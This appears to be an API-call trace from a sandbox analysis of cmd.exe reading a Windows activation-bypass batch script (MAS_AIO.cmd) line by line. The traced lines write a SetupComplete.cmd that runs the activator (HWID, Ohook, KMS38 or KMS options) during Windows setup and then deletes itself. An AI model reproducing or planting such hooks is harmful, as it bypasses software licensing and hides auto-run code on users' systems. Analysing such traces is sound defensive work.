[0181.222] GetFileType (hFile=0x9c) returned 0x1 [0181.222] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.222] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==4 (set \"_oem=Online KMS\" & set \"para=/KMS-ActAndRenewalTask /KMS-WindowsOffice\" &goto:Extract$OEM$3)\r\n", cbMultiByte=113, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==4 (set \"_oem=Online KMS\" & set \"para=/KMS-ActAndRenewalTask /KMS-WindowsOffice\" &goto:Extract$OEM$3)\r\ne\" &goto:Extract$OEM$3)\r\n") returned 113 [0181.222] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.222] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.222] GetFileType (hFile=0x9c) returned 0x1 [0181.222] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.222] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==3 (set \"_oem=KMS38\" & set \"para=/KMS38\" &goto:Extract$OEM$3)\r\n", cbMultiByte=73, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==3 (set \"_oem=KMS38\" & set \"para=/KMS38\" &goto:Extract$OEM$3)\r\nMS-WindowsOffice\" &goto:Extract$OEM$3)\r\n") returned 73 [0181.222] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.222] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.222] GetFileType (hFile=0x9c) returned 0x1 [0181.223] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.223] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==2 (set \"_oem=Ohook\" & set \"para=/Ohook\" &goto:Extract$OEM$3)\r\n", cbMultiByte=73, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==2 (set \"_oem=Ohook\" & set \"para=/Ohook\" &goto:Extract$OEM$3)\r\n") returned 73 [0181.223] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.223] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.223] GetFileType (hFile=0x9c) returned 0x1 [0181.223] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.223] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==1 (set \"_oem=HWID\" & set \"para=/HWID\" &goto:Extract$OEM$3)\r\n", cbMultiByte=71, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==1 (set \"_oem=HWID\" & set \"para=/HWID\" &goto:Extract$OEM$3)\r\n\r\n") returned 71 [0181.223] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.223] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.223] GetFileType (hFile=0x9c) returned 0x1 [0181.223] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.223] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto :Extract$OEM$2\r\n", cbMultiByte=21, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto :Extract$OEM$2\r\nem=HWID\" & set \"para=/HWID\" &goto:Extract$OEM$3)\r\n") returned 21 [0181.223] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.223] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.223] GetFileType (hFile=0x9c) returned 0x1 [0181.223] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.223] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nto :Extract$OEM$2\r\n") returned 2 [0181.223] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.223] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.223] GetFileType (hFile=0x9c) returned 0x1 [0181.223] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.223] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0181.224] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.224] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.224] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.224] GetFileType (hFile=0x9c) returned 0x1 [0181.224] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.224] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0181.224] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.224] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.224] GetFileType (hFile=0x9c) returned 0x1 [0181.224] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.224] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":Extract$OEM$3\r\n", cbMultiByte=16, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":Extract$OEM$3\r\n==========================================================================================================================\r\n") returned 16 [0181.224] _wcsicmp (_String1="_color2", _String2="Extract$OEM$3") returned -6 [0181.224] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.224] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.224] GetFileType (hFile=0x9c) returned 0x1 [0181.224] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.224] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nxtract$OEM$3\r\n") returned 2 [0181.224] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.224] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.224] GetFileType (hFile=0x9c) returned 0x1 [0181.224] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.224] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="cls\r\nact$OEM$3\r\n") returned 5 [0181.225] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.225] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.225] GetFileType (hFile=0x9c) returned 0x1 [0181.225] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.225] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_dir=!_desktop_!\\$OEM$\\$$\\Setup\\Scripts\"\r\n", cbMultiByte=47, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_dir=!_desktop_!\\$OEM$\\$$\\Setup\\Scripts\"\r\n===========================================================================================\r\n") returned 47 [0181.225] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.225] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.225] GetFileType (hFile=0x9c) returned 0x1 [0181.225] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.225] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="md \"!_dir!\\\"\r\n", cbMultiByte=14, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="md \"!_dir!\\\"\r\nsktop_!\\$OEM$\\$$\\Setup\\Scripts\"\r\n") returned 14 [0181.225] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.225] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.225] GetFileType (hFile=0x9c) returned 0x1 [0181.225] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.225] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="copy /y /b \"!_batf!\" \"!_dir!\\MAS_AIO.cmd\" %nul%\r\n", cbMultiByte=49, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="copy /y /b \"!_batf!\" \"!_dir!\\MAS_AIO.cmd\" %nul%\r\n=========================================================================================\r\n") returned 49 [0181.225] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.225] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.225] GetFileType (hFile=0x9c) returned 0x1 [0181.225] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.225] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\npy /y /b \"!_batf!\" \"!_dir!\\MAS_AIO.cmd\" %nul%\r\n") returned 2 [0181.225] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.225] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.225] GetFileType (hFile=0x9c) returned 0x1 [0181.226] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.226] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="(\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="(\r\ny /y /b \"!_batf!\" \"!_dir!\\MAS_AIO.cmd\" %nul%\r\n") returned 3 [0181.226] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.226] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.226] GetFileType (hFile=0x9c) returned 0x1 [0181.226] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.226] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo @echo off\r\n", cbMultiByte=16, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo @echo off\r\ntf!\" \"!_dir!\\MAS_AIO.cmd\" %nul%\r\n") returned 16 [0181.226] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.226] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.226] GetFileType (hFile=0x9c) returned 0x1 [0181.226] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.226] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo fltmc ^>nul ^|^| exit /b\r\n", cbMultiByte=31, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo fltmc ^>nul ^|^| exit /b\r\nS_AIO.cmd\" %nul%\r\n") returned 31 [0181.226] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.226] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.226] GetFileType (hFile=0x9c) returned 0x1 [0181.226] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.226] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo call \"%%~dp0MAS_AIO.cmd\" %para%\r\n", cbMultiByte=38, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo call \"%%~dp0MAS_AIO.cmd\" %para%\r\nmd\" %nul%\r\n") returned 38 [0181.226] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.226] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.226] GetFileType (hFile=0x9c) returned 0x1 [0181.226] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.226] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo cd \\\r\n", cbMultiByte=11, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo cd \\\r\n%%~dp0MAS_AIO.cmd\" %para%\r\n") returned 11 [0181.227] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.227] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.227] GetFileType (hFile=0x9c) returned 0x1 [0181.227] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.227] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^(goto^) 2^>nul ^& ^(if \"%%~dp0\"==\"%%SystemRoot%%\\Setup\\Scripts\\\" rd /s /q \"%%~dp0\"^)\r\n", cbMultiByte=92, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo ^(goto^) 2^>nul ^& ^(if \"%%~dp0\"==\"%%SystemRoot%%\\Setup\\Scripts\\\" rd /s /q \"%%~dp0\"^)\r\n==============================================\r\n") returned 92 [0181.227] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.227] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.227] GetFileType (hFile=0x9c) returned 0x1 [0181.227] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.227] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")>\"!_dir!\\SetupComplete.cmd\"\r\n", cbMultiByte=30, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")>\"!_dir!\\SetupComplete.cmd\"\r\n%%~dp0\"==\"%%SystemRoot%%\\Setup\\Scripts\\\" rd /s /q \"%%~dp0\"^)\r\n") returned 30 [0181.227] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.227] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.227] GetFileType (hFile=0x9c) returned 0x1 [0181.227] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.227] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\"!_dir!\\SetupComplete.cmd\"\r\n") returned 2 [0181.227] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.227] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.227] GetFileType (hFile=0x9c) returned 0x1 [0181.227] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.227] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _error=\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _error=\r\nupComplete.cmd\"\r\n") returned 13 [0181.227] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.227] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.228] GetFileType (hFile=0x9c) returned 0x1 [0181.228] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.228] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not exist \"!_dir!\\MAS_AIO.cmd\" set _error=1\r\n", cbMultiByte=48, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if not exist \"!_dir!\\MAS_AIO.cmd\" set _error=1\r\nRoot%%\\Setup\\Scripts\\\" rd /s /q \"%%~dp0\"^)\r\n") returned 48 [0181.228] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.228] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.228] GetFileType (hFile=0x9c) returned 0x1 [0181.228] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.228] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not exist \"!_dir!\\SetupComplete.cmd\" set _error=1\r\n", cbMultiByte=54, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if not exist \"!_dir!\\SetupComplete.cmd\" set _error=1\r\n\\Setup\\Scripts\\\" rd /s /q \"%%~dp0\"^)\r\n") returned 54 [0181.228] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.228] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.228] GetFileType (hFile=0x9c) returned 0x1 [0181.228] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.228] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n not exist \"!_dir!\\SetupComplete.cmd\" set _error=1\r\n") returned 2 [0181.228] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.228] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.228] GetFileType (hFile=0x9c) returned 0x1 [0181.228] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.228] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined _error (\r\n", cbMultiByte=21, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if defined _error (\r\nSetupComplete.cmd\" set _error=1\r\n") returned 21 [0181.228] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.228] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.228] GetFileType (hFile=0x9c) returned 0x1 [0181.228] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.228] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%eline%\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="%eline%\r\nd _error (\r\n") returned 9 [0181.229] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.229] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.229] GetFileType (hFile=0x9c) returned 0x1 [0181.229] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.229] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Failed to extract $OEM$ folder on the Desktop.\r\n", cbMultiByte=53, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo Failed to extract $OEM$ folder on the Desktop.\r\n\n") returned 53 [0181.229] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.229] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.229] GetFileType (hFile=0x9c) returned 0x1 [0181.229] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.229] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=") else (\r\n", cbMultiByte=10, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=") else (\r\nd to extract $OEM$ folder on the Desktop.\r\n") returned 10 [0181.229] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.229] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.229] GetFileType (hFile=0x9c) returned 0x1 [0181.229] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.229] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n(\r\n") returned 7 [0181.229] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.229] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.229] GetFileType (hFile=0x9c) returned 0x1 [0181.229] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.229] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color %Blue% \"%_oem%\"\r\n", cbMultiByte=30, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="call :_color %Blue% \"%_oem%\"\r\nolder on the Desktop.\r\n") returned 30 [0181.229] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.229] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.229] GetFileType (hFile=0x9c) returned 0x1 [0181.229] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.230] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color %Green% \"$OEM$ folder is successfully created on the Desktop.\"\r\n", cbMultiByte=77, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="call :_color %Green% \"$OEM$ folder is successfully created on the Desktop.\"\r\n/q \"%%~dp0\"^)\r\n") returned 77 [0181.230] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.230] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.230] GetFileType (hFile=0x9c) returned 0x1 [0181.230] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.230] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\nl :_color %Green% \"$OEM$ folder is successfully created on the Desktop.\"\r\n") returned 3 [0181.230] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.230] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.230] GetFileType (hFile=0x9c) 